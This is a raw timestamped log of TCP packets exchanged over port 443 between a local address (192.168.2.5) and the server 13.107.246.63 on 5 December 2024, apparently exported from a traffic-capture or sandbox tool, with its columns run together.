                                                                                        Dec 5, 2024 22:51:11.061140060 CET49961443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.061157942 CET4434996113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.062087059 CET49962443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.062143087 CET4434996213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.062203884 CET49962443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.062335968 CET49962443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.062347889 CET4434996213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.069613934 CET49963443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.069633007 CET4434996313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.069705009 CET49963443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.074007034 CET49964443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.074044943 CET4434996413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.074106932 CET49964443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.074188948 CET49963443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.074209929 CET4434996313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.077234030 CET49964443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.077250004 CET4434996413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.276945114 CET4434996013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.279388905 CET49960443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.279419899 CET4434996013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.279902935 CET49960443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.279906988 CET4434996013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.662568092 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.662659883 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.662772894 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.663131952 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.663161993 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.711664915 CET4434996013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.714821100 CET4434996013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.717528105 CET49960443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.722470045 CET49960443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.722496986 CET4434996013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.722528934 CET49960443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.722534895 CET4434996013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.725411892 CET49966443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.725460052 CET4434996613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:11.725646019 CET49966443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.725847006 CET49966443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:11.725863934 CET4434996613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.778151035 CET4434996213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.778769016 CET49962443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:12.778803110 CET4434996213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.779251099 CET49962443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:12.779258013 CET4434996213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.782562971 CET4434996113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.782879114 CET49961443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:12.782902956 CET4434996113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.783250093 CET49961443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:12.783253908 CET4434996113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.792129040 CET4434996413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.792469978 CET4434996313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.792475939 CET49964443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:12.792500019 CET4434996413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.792859077 CET49964443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:12.792864084 CET4434996413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.793112993 CET49963443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:12.793131113 CET4434996313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:12.793490887 CET49963443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:12.793500900 CET4434996313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.212456942 CET4434996213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.212714911 CET4434996213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.212759018 CET4434996213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.212879896 CET49962443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.212879896 CET49962443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.217233896 CET49962443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.217251062 CET4434996213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.217262030 CET49962443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.217267036 CET4434996213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.217856884 CET4434996113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.217916965 CET4434996113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.217971087 CET49961443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.226716995 CET4434996413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.226773977 CET4434996413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.226823092 CET49964443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.227336884 CET4434996313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.227669001 CET4434996313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.227716923 CET49963443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.227760077 CET49963443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.227778912 CET4434996313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.227788925 CET49963443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.227793932 CET4434996313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.264399052 CET49961443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.264399052 CET49961443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.264406919 CET4434996113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.264416933 CET4434996113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.265430927 CET49964443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.265451908 CET4434996413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.265464067 CET49964443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.265469074 CET4434996413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.288317919 CET49967443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.288424015 CET4434996713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.288506031 CET49967443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.289779902 CET49968443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.289800882 CET4434996813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.289875984 CET49968443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.289959908 CET49967443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.289995909 CET4434996713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.290800095 CET49968443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.290812016 CET4434996813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.291876078 CET49969443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.291908026 CET4434996913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.291960001 CET49969443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.292073965 CET49969443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.292084932 CET4434996913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.292655945 CET49970443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.292663097 CET4434997013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.292714119 CET49970443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.293164968 CET49970443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.293174982 CET4434997013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.379683018 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.379911900 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.459687948 CET4434996613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.507824898 CET49966443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.642185926 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.642254114 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.642561913 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.653534889 CET49966443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.653562069 CET4434996613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.657342911 CET49966443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.657351017 CET4434996613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.685436010 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.890022993 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.931364059 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.974256039 CET4434996613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.974343061 CET4434996613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.974395037 CET49966443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.974805117 CET49966443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.974829912 CET4434996613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.974842072 CET49966443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.974847078 CET4434996613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.978806019 CET49971443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.978849888 CET4434997113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:13.978919029 CET49971443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.979048967 CET49971443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:13.979059935 CET4434997113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:14.262145996 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:14.262182951 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:14.262190104 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:14.262224913 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:14.262253046 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:14.262336969 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.474744081 CET49968443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.475024939 CET49967443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.475044012 CET49969443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.475059986 CET4434996713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.475064993 CET4434996913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.475085974 CET49969443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.475091934 CET4434996913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.476315022 CET49968443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.476319075 CET4434996813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.476330996 CET49968443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.476335049 CET4434996813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.478802919 CET49972443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.478857040 CET4434997213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.478938103 CET49972443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.479465961 CET49972443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.479495049 CET4434997213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.481534004 CET49973443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.481569052 CET4434997313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.481625080 CET49973443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.481760025 CET49974443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.481786966 CET4434997413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.481844902 CET49974443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.481852055 CET49973443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.481867075 CET4434997313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.482580900 CET49975443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.482593060 CET4434997513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.482637882 CET49975443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.482708931 CET49974443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.482738018 CET4434997413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.483197927 CET49975443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.483211040 CET4434997513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.563477993 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.563500881 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.563610077 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.563673019 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.563724995 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.570036888 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.570060968 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.570116043 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.570161104 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.570193052 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.570204020 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.575881958 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.575903893 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.575961113 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.575982094 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.576030970 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.582375050 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.582397938 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.582437992 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.582446098 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.582477093 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.582495928 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.588819981 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.588841915 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.588892937 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.588929892 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.588952065 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.588968992 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.594930887 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.594955921 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.595000029 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.595024109 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.595036983 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.595057011 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.601551056 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.601577044 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.601778030 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.601802111 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.601847887 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.607227087 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.607275009 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.607347012 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.607361078 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.607467890 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.762778997 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.762798071 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.762896061 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.762926102 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.762959957 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.769243956 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.769260883 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.769341946 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.769366980 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.769407034 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.775808096 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.775827885 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.775893927 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.775912046 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.775953054 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.781558990 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.781577110 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.781625986 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.781641960 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.781676054 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.788441896 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.788460016 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.788516998 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.788541079 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.788598061 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.794166088 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.794188023 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.794226885 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.794248104 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.794264078 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.794286966 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.800740957 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.800757885 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.800843000 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.800865889 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.800909996 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.807285070 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.807301044 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.807391882 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.807400942 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.807445049 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.835855961 CET4434997113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.836421967 CET49971443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.836452961 CET4434997113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.836875916 CET49971443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.836880922 CET4434997113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.947654963 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.947675943 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.947777033 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.947814941 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.947868109 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.954082966 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.954099894 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.954170942 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.954207897 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.954252958 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.960694075 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.960709095 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.960786104 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.960813999 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.960863113 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.966480017 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.966499090 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.966593981 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.966610909 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.966705084 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.973025084 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.973042011 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.973118067 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.973138094 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.973191977 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.979156971 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.979172945 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.979243994 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.979305983 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.979377031 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.985599995 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.985616922 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.985688925 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.985704899 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.985750914 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.992203951 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.992222071 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.992314100 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:15.992343903 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:15.992383957 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:16.139938116 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.139956951 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.140064001 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:16.140105963 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.140156031 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:16.146231890 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.146246910 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.146347046 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:16.146373987 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.146414042 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:16.152672052 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.152684927 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.152761936 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:16.152784109 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.152827024 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:16.158348083 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.158364058 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.158490896 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:16.158513069 CET4434996513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:16.158565044 CET49965443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:22.779062033 CET49983443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:22.779093027 CET4434998313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:22.779129028 CET49983443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:22.779134989 CET4434998313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:22.863332987 CET49984443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:22.863349915 CET4434998413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:22.864054918 CET49984443192.168.2.513.107.246.63
